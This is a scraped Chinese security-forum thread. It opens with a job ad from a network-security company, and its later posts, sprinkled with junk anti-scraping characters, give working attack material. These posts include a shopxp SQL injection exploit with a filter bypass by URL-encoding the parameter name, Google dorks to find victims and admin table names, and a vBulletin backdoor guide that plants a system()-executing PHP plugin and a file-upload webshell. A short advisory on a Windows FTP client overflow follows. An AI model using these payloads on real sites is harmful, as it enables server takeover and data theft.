返回列表 发帖
  • 招聘职位: 其他职位
  • 公司名称: 启明星辰
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 1年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.venustech.com.cn
  • 简历邮箱: liu_yanhua@venustech.com.cn
  • 联系电话: 00000000000
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++启明星辰相关说明++++++++++

    岗位:备机库主管
    4 D" q2 f" u$ E2 O! f$ w9 S8 Q7 L' L5 j& }' d3 G- [& Z# u
    / O& G# _  N3 ^! c; o
    岗位职责:2 C- K+ I1 R  t2 r- X# n
    0 Z% {' S6 a8 C& ?- X: L
    1.负责公司产品备机库的管理。
    , y- F5 ^! v' q7 o! p  a' d+ \' f8 ^) V' e
    2.产品安装调试。, ~2 B" q$ X7 \: O" R: g! ^
    # W- D+ Z3 R6 {5 G' n" m
    3.对备机使用情况做统计分析。
    5 a) D- X, Z) ^/ T8 f! T; b6 ]% B7 E! [3 a7 i
    岗位要求:( |0 ?8 t$ l* U2 d

    : `' Z8 ?, C4 c+ t, T: e1.熟悉客户关系管理、网络安全相关知识;了解数据统计分析技术。9 W3 m  t4 c9 M+ A1 x

    ) K% z- G$ T- Y! L2.熟悉路由器、交换机等常用网络设备。
    0 r( ]2 B* r' e5 Q/ F% _$ j5 V% h
    6 P8 W  O( M) Y( ?* l  a  l3.熟悉防火墙、VPN等常见网络安全产品。
    - N3 G, `- R. ]- t1 h: n- O4 k3 {: j0 j9 Z. x
    4.了解计算机硬件相关知识。" I  R. R$ V: R* n' c5 P. z) b
    5 B* y4 J" e7 q
    5.一年以上硬件技术支持经验,有网络安全行业经验优先考虑。9 N; K4 q/ w% [2 D0 M; Z, r8 N
    & e4 v4 ~4 }, p' Y* v; o6 Y
    6.有较强的责任心,有敬业精神,有良好的沟通能力、动手能力,有团队合作精神,学习能力强。6 A5 J. Q0 h8 t0 z3 R4 M
    " \) c2 ?2 J8 G* x: m
    发送简历

     

    您可能还想看的主题:

    浙江政安信息安全研究中心招贤纳士啦!

    启明星辰研发招聘

    合优网站管理系统存在SQL注射。。。原创首发~

    联想研究院 安全职位

    PHP VS ASP

    计算机硬件维护知识

    1

    评分人数

      • webmaster: 楼主MJJ威望 + 30 金钱 + 200 金
    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:小妍发表,本帖发表者小妍符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者小妍和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。

    shopxp v7.4 SQL注入漏洞
    shopxp网上购物系统 v7.4存在Sql注入漏洞。问题文件:xpCatalog_xpDesc.asp,xpCatalog_xpsmall_Desc.asp问题代码:<% ) E4 n# O7 S  ?* g8 z' o
    dim shopxpbe_id, anclassname, shopxpse_id, nclassnamedim totalPut dim CurrentPage, TotalPages
      K3 Y5 k$ X& i( O* b% n# u% D
    if request("shopxpbe_id")<>"" thenshopxpbe_id=request("shopxpbe_id")elseshopxpbe_id=0end ifif request("shopxpbe_id")="" then shopxpbe_id=1end ifif not isempty(request("page")) thencurrentPage=cint(request("page"))elsecurrentPage=1end if
    7 W* U- X8 L4 z/ R5 q7 G
    set rs=server.createobject("adodb.recordset")rs.open "select * from shopxp_btype where shopxpbe_id="&amp;shopxpbe_id,conn,1,1anclassname=rs("shopxpbe_name")rs.close%>并没有对shopxpbe_id进行整形判断。下面在说说他的防注入系统。好像是网上的枫叶防注入。看代码吧:Dim Fy_Url,Fy_a,Fy_x,Fy_Cs(),Fy_Cl,Fy_Ts,Fy_ZxFy_Cl = 2 '处理方式:1=提示信息,2=转向页面,3=先提示再转向Fy_Zx = "../" '出错时转向的页面On Error Resume NextFy_Url=Request.ServerVariables("QUERY_STRING")Fy_a=split(Fy_Url,"&amp;")redim Fy_Cs(ubound(Fy_a))On Error Resume Nextfor Fy_x=0 to ubound(Fy_a)Fy_Cs(Fy_x) = left(Fy_a(Fy_x),instr(Fy_a(Fy_x),"=")-1)NextFor Fy_x=0 to ubound(Fy_Cs)If Fy_Cs(Fy_x)<>"" ThenIf Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 Or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 ThenSelect Case Fy_Cl省略部分代码

    1 S8 V6 @/ }! A# {2 A3 [
    这个防注入系统在网上貌似很火,但是他防的是有问题的。关键是这句,Fy_Url=Request.ServerVariables("QUERY_STRING"),Request.ServerVariables得到的数据是原样的,并不会进行URL解码。这也就导致可以进行URL编码绕过这个防注入。以下是lake2对这段代码的分析:

    & t8 e# T6 N4 i
    “它的思路就是先获得提交的数据,以“&amp;”为分界获得并处理name/value组,然后判断value里是否含有定义的关键字(这里为求简便,我只留下了“and”),有之,则为注射。

    , G$ X% n. v% W! j/ O
    乍一看去,value被检查了,似乎没有问题。呵呵,是的,value不会有问题,可是,name呢?
    ) J5 t/ \' H$ t9 T/ f3 M4 `
    它的name/value组值来自于Request.ServerVariables("QUERY_STRING"),呵呵,不好意思,这里出问题了。Request.ServerVariables("QUERY_STRING")是得到客户端提交的字符串,这里并不会自动转换url编码,哈哈,如果我们把name进行url编码再提交的话,呵呵,那就可以绕过检查了。比如参数是ph4nt0m=lake2 and lis0,此时程序能够检测到;如果提交%50h4nt0m=lake2 and lis0(对p进行url编码),程序就会去判断%50h4nt0m的值,而%50h4nt0m会被转换为ph4nt0m,所以%50h4nt0m值为空,于是就绕过了检测。
    9 G) S8 s5 g: j5 O
    等等,为什么既然name不解码可以绕过检查而value就不能绕过呢?因为value的值取自Request(Fy_Cs(Fy_x)),这个服务器就会解码的。
    * {! ?, K! o" K1 X* d5 q$ @* M
    程序怎么改进呢?只要能够得到客户端提交的数据是解码后的就可以了,把得到name的语句改为For Each SubmitName In Request.QueryString就可以了。”
    ( Y$ W- F# [8 q0 `" ]1 {
    下面说下利用:Google:inurl:xpCatalog_xpDesc.asp?action_key_order=biginurl:Catalog_Desc.asp?action_key_order=big (这个貌似是商业版的)构造如下地址:http://www.sitedir.com.cn/xpCatalog_xpDesc.asp?action_key_order=big&amp;shopxpbe_%69d=79 (对i进行URL编码),交给工具 手动添加表名:shopxp_admin 和shop_admin(商业版的)默认后台是 admin_shopxp 或者admin
    * }. m6 q* P! s. J3 d  ^( ^, Q6 c
    3 C8 E: l5 V; S2 M) [

    : @$ Y' g: ?1 C/ Z! l
    . d5 ^4 @) D. A6 |/ m& x1 I9 L! X& n; |9 i; I

    , ^, _. V3 a; K% ^% o* B' ]6 y" v+ A8 j* A2 e& Y
    : M# z4 w0 i/ I  ~
    5 M3 `) U: s+ \$ V
    * f. y4 P0 ]4 ^9 l
      f/ i$ _' S% v  {$ h- e+ Y
    0 a( i1 i4 a( G$ h- S4 {# o/ b$ s' i" V4 O2 t

    9 E$ G6 V# E3 a+ m
    2 K9 I5 @0 ^9 L0 c3 L2 D3 a/ E$ }" K1 h- {% ]
    ; i) s  a+ ^+ S( `3 B7 x

    % g+ |3 p1 [0 U) T& z- N
    ; n. o) R/ l4 d% A, e8 x
    # ^+ J! |: @/ g$ j/ X9 ^公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    vBulletin后台获取webshell方法总结
    方法一:1 Z+ z' p1 _- h8 m
    首先在“插件和产品”(Plugins and Products)下边选择插件管理(Plugin Manager),然后右边选择添加新插件(Add New Plugin),在“Hook Location”(不知道杂翻译)处选择ajax_complete,Title处随便写,比如JK7OSE,然后关键的地方到了“Plugin PHP Code”(插件PHP代码),输入if(isset($_GET['jkrose'])){echo "<h1>jkrose</h1><pre>"; system($_GET['jkrose']);exit;}注意,是去掉PHP的<? ?>标记的,这样就算完成了,利用时只需ajax.php?jkrose=cmd命令,可以wget一个webshell,可以ls -la,cat filename等YY的事。
    5 }* Z/ n# s5 a* X% Q- s& I" R$ k1 g$ T, F, P2 a$ ^$ l
    方法二:$ a. l2 [/ ^" u
    前边相同,代码处写一个接收上传的代码:

    / |* ~, r9 v9 T$ V$ U% W% U
    $target_path = "images/avatars"; //注意权限要为可写的
    ' h7 H9 {7 H, j* s; y& E
    $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);

    0 X6 Z! H9 A% p) q
    if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { 2 j5 t- k3 K$ T1 p/ z0 y
        echo "The file ". basename( $_FILES['uploadedfile']['name']). 5 D$ A' K8 u( c0 ?
        " has been uploaded";
    0 V  H3 @! h; {7 [& R' V- K4 d} else{
    ' [$ x! q/ C+ l) x, q& O    echo "There was an error uploading the file, please try again!"; ; T" Y" B" X, p  P- K8 a  ?) P
    }

    9 Z; @) |7 ?9 X. V% C
       然后访问ajax.php会提示“No input File Specified”之类的,如果没出现的话那肯定时哪有问题了,如果出现了就继续下边的,在网站随便某个地方,只要能写HTML代码就行,写个上传,比如说模板编辑那些地方,写个上传代码:
    2 _* Z0 H: i% v8 M; ^
    <form enctype="multipart/form-data" action="ajax.php" method="POST"> - l3 C5 Z/ e9 g" N& o' I
    <input type="hidden" name="MAX_FILE_SIZE" value="100000" /> - d; C' P/ o1 P, P! J2 g5 r
    Choose a file to upload: <input name="uploadedfile" type="file" /><br /> 4 ]  L2 c3 s6 n4 Z
    <input type="hidden" name="s" value="$session[sessionhash]" />
    ) }! H0 ?3 F4 h7 {<input type="hidden" name="securitytoken" value="$bbuserinfo[securitytoken]" /> & W1 @' h+ d% [9 B/ ~2 q6 L
    <input type="submit" value="Upload File" />
    ; _* X0 p. y6 Y8 @6 \  l</form>
    4 j" K5 Q7 Q' f/ ?4 C
    保存就完工了,最后如果时新添加的风格的话,要在网站左下角切换过来才能用
    , \' S' o: H3 x: a
    4 m" l5 ]1 R4 z( [3 k! Z

    & m0 {0 ]3 W2 V/ c0 q( [
    # M$ N% [; t' v! L+ O5 h
    % [7 I" o& f' y  a1 ]% b
    6 g8 B6 w" d- C- c  D+ c0 d5 |, V  G' u( l5 {

    ' M0 B9 h3 a# a6 u3 w4 ~' o7 a7 n+ A% f1 B& Y# ?

    / @6 e6 u7 _' \' |5 F
    4 B5 B5 V+ A& n% O/ o+ y1 L- [/ i3 L2 X/ ]0 m) D" F7 H1 z+ ^

    / h& q9 B6 Z. \4 i- Q
    ( L- |' O, Q( D6 |; ?
    # x; ~4 Z5 I2 g: ?8 s6 G# i2 v% S; L
    4 D1 R- e7 l  ?, I  v4 c% c/ S- [
    7 ]4 s, |& _. e2 G+ t9 `+ a

    ) K' M, U: M0 h$ _& U5 L
    4 w/ P9 R1 e. t& ^0 `
    - D7 N# I4 ]- p: I' c& N公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Microsoft Windows FTP客户端有多个远程溢出漏洞
    受影响系统:Microsoft Windows XPMicrosoft Windows 2000SP4Microsoft Windows 2000 Server SP4
    ( M. a( l9 _7 O$ K7 h8 a
    描述:
    ) t0 N2 p, F, Q( ^
    Microsoft Windows是微软发布的非常流行的操作系统。
    4 H& l% b* w2 g0 ]. m- F( i" w9 j9 n
    Windows系统自带的FTP客户端实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制客户端。
    2 Q) `$ ~$ n: Q* U+ e1 i/ g0 D( o
    Windows操作系统所捆绑的FTP客户端没有正确地验证mget、dir、user、password、ls等命令,如果用户使用FTP客户端连接到了FTP服务器上带有超长文件夹名或文件名的目录并发布了上述命令的话,就可以触发缓冲区溢出,导致拒绝服务或执行任意指令。但这个漏洞较难利用,因为需要社会工程学且必须以有漏洞命令参数的形式注入shellcode。

    - y2 H2 B6 Z. Y5 u, g  V
    厂商补丁:
    & F' l# ^$ J& g/ A
    目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
    6 h& x2 k1 {- j
    http://www.microsoft.com/technet/security/

    ' D1 [/ {0 y) w% S7 R
    / y9 X& u; L! y/ I
    " R/ s: w7 b) p! G6 u% K2 o. m. M. E8 G& Q  U. T+ F$ U

    & W4 p3 _% r  m  p: ]* f
    - W9 U1 k, m9 H" W! p: N' o5 j1 T1 K7 X4 |* A$ T) \7 X

    + Z! |( s2 {- `5 K
    - D6 [) E' w# S; ?: ~7 k# t3 G
    + z) H% f  w0 N5 I& d3 a7 T! K1 n3 u) r5 {

    3 v, o! c, J. `  U0 _0 p
    0 r1 W) _: s0 ?: \9 f9 }. v
    6 h( Y: V" H9 j& |. M
    1 D" D8 H5 @8 ]% r) F
    - m0 t4 M; y: o( ]; q& l! G$ A8 h0 @4 w8 |

      s. E2 a& g; C2 ?* m) `6 V# n+ g) i) |0 K3 j. y
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表